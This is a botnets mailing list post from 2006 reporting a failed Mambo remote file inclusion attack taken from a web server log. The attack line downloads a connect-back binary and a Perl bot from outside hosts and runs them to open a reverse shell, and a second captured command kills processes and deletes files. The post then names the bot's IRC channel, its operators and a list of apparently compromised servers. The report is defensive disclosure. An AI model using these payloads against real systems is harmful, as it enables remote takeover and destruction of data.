To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Greetings list,
This one I found on Undernet, a few moments ago. Here is the information: Mambo attack attempt on the 28th, failed: 216.63.146.236 - - [28/Feb/2006:10:06:41 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 214 I noticed a set of commands after connecting to: 217.160.242.90:8081 via telnet, they are: "kill -9 -1;wget 219.96.212.234/~maruyama/under;perl under;rm -rf *" in analyzing: 219.96.212.234/~maruyama/under, it's a perl Bot which connects to: Server: eu.undernet.org Channel: #sex1234 The bot references "HSDDFOPJ" as the administrator, but if you look at the perl texts heading you see the poseudonym "mihaiu", which happens to be in the channels user list. Userlist: #sex1234 wer555s-30 H [EMAIL PROTECTED] (Linux compaq6400r 2.4.26rz-a #1 SMP Thu Apr 29 14:) #sex1234 wer555s-89 H [EMAIL PROTECTED] (Linux host56-234-149-62.serverdedicati.aruba.it 2.) #sex1234 wer555s-76 H [EMAIL PROTECTED] (Linux zeus 2.6.5-7.201-default #1 Thu Aug 25 06:20) #sex1234 wer555s-10 H [EMAIL PROTECTED] (Linux serv2.yellowmonday.nl 2.6.12-1.1378_FC3smp #) #sex1234 wer555s-36 H [EMAIL PROTECTED] (Linux linux-web 2.6.8-2-386 #1 Tue Aug 16 12:46:35) #sex1234 wer555s-29 H [EMAIL PROTECTED] (Linux web server 2.6.12-12mdksmp #1 SMP Fri Sep 9 ) #sex1234 er3333s-86 H [EMAIL PROTECTED] (FreeBSD etrovi.work.svhfi.de 4.11-RELEASE-p11 Free) #sex1234 wer555s-92 H [EMAIL PROTECTED] (Linux AirVienna05 2.6.12-9-686 #1 Mon Oct 10 13:25) #sex1234 wer555s-92 H [EMAIL PROTECTED] (Linux intra.meerschwein.hh.schule.de 2.6.12-9-386 ) #sex1234 wer555s-57 H [EMAIL PROTECTED] (Linux HelpDesk.MHAONLINE.org 2.4.19C13_V #1 Fri Fe) #sex1234 wer555s-27 H [EMAIL PROTECTED] (Linux server 2.6.9-1.667 #1 Tue Nov 2 14:41:25 EST) #sex1234 wer555s-53 H@ [EMAIL PROTECTED] (Linux app-server.evosolutionsllc.com 2.4.21-32.0.1) #sex1234 wer555s-40 H [EMAIL PROTECTED] (Linux server.theisland.com 2.6.11-1.27_FC3 #1 Tue ) #sex1234 wer555s-13 H [EMAIL PROTECTED] (Linux lhome 2.6.12.3 #7 SMP Sun Sep 11 13:18:03 CD) #sex1234 wer555s-12 H [EMAIL PROTECTED] (Linux ford 2.6.11-6mdk-i586-up-1GB #1 Tue Mar 22 1) #sex1234 wer555s-68 H [EMAIL PROTECTED] (Linux miue.net 2.6.9-11.EL #1 Wed Jun 8 16:59:52 C) #sex1234 wer555s- H [EMAIL PROTECTED] (Linux shark 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2) #sex1234 wer555s-18 H [EMAIL PROTECTED] (Linux paralegalprofessionals.com 2.4.20-021stab028) #sex1234 qwer555s-1 H@ [EMAIL PROTECTED] (FreeBSD newreport.hichannel.hinet.net 4.10-RELEASE) #sex1234 qwer555s-7 H [EMAIL PROTECTED] (Linux forcedwhitewife.com 2.4.9-e.62smp #1 SMP Fri) #sex1234 wer555s-25 H [EMAIL PROTECTED] (Linux mail.meierhenrylaw.com 2.4.22-1.2199.nptl #1) #sex1234 darkly H@ [EMAIL PROTECTED] (Linux candbvideo.com 2.4.9-e.62smp #1 SMP Fri Apr ) #sex1234 qwer555s-3 H [EMAIL PROTECTED] (Linux ns.samplesite.org 2.6.10-1.771_FC2 #1 Mon Ma) #sex1234 wer555s-12 H [EMAIL PROTECTED] (Linux dl360.KOYOELE.COM.CN 2.6.9-5.ELsmp #1 SMP We) #sex1234 wer555s-35 H [EMAIL PROTECTED] (Linux www 2.6.5-7.202.7-default #1 Tue Nov 29 14:3) #sex1234 wer555s-35 H [EMAIL PROTECTED] (Linux master.ricetons.com 2.6.11-12mdkcustom #9 We) #sex1234 qwer555s-2 H@ [EMAIL PROTECTED] (Linux reecestudio.com 2.4.9-e.62smp #1 SMP Fri Apr) #sex1234 er3333s- H [EMAIL PROTECTED] (Linux server145.thirdwatch.net 2.4.30.dn1.p3.u #2 ) #sex1234 qwer555s-4 H [EMAIL PROTECTED] (Linux h561368 2.4.29 #3 SMP Tue Feb 15 01:47:49 CE) #sex1234 er3333s-29 H [EMAIL PROTECTED] (Linux server2.repodata.us 2.4.20-31.9 #1 Tue Apr 1) #sex1234 qwer555s-5 H [EMAIL PROTECTED] (Linux www.canerose.net 2.4.19C13_V #1 Fri Feb 20 0) #sex1234 wer555s-52 H [EMAIL PROTECTED] (Linux sp0438a.serverpronto.com 2.4.20-35.9.legacy ) #sex1234 wer555s-99 H [EMAIL PROTECTED] (Linux corpextutil01.corp.d2dcars.com 2.4.21-9.ELsm) #sex1234 wer555s-50 H [EMAIL PROTECTED] (FreeBSD amd1800.bgwinc.com. 4.11-STABLE FreeBSD 4.) #sex1234 qwer555s-9 H [EMAIL PROTECTED] (Linux server1.quickserver.com 2.4.22-1.2115.nptl #) #sex1234 qwer555s- H@ [EMAIL PROTECTED] (Linux webmail.woyaa.com 2.4.20-31.9 #1 Tue Apr 13 ) #sex1234 wer555s-83 H [EMAIL PROTECTED] (Linux argon036 2.4.21-280-athlon #1 Thu Mar 17 15:) #sex1234 mihaitza [EMAIL PROTECTED] [EMAIL PROTECTED] (mihai) #sex1234 HSDDFOPJ H@ [EMAIL PROTECTED] (mihaitza) #sex1234 mihaitza` [EMAIL PROTECTED] [EMAIL PROTECTED] (mihai) _______________________________________________ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
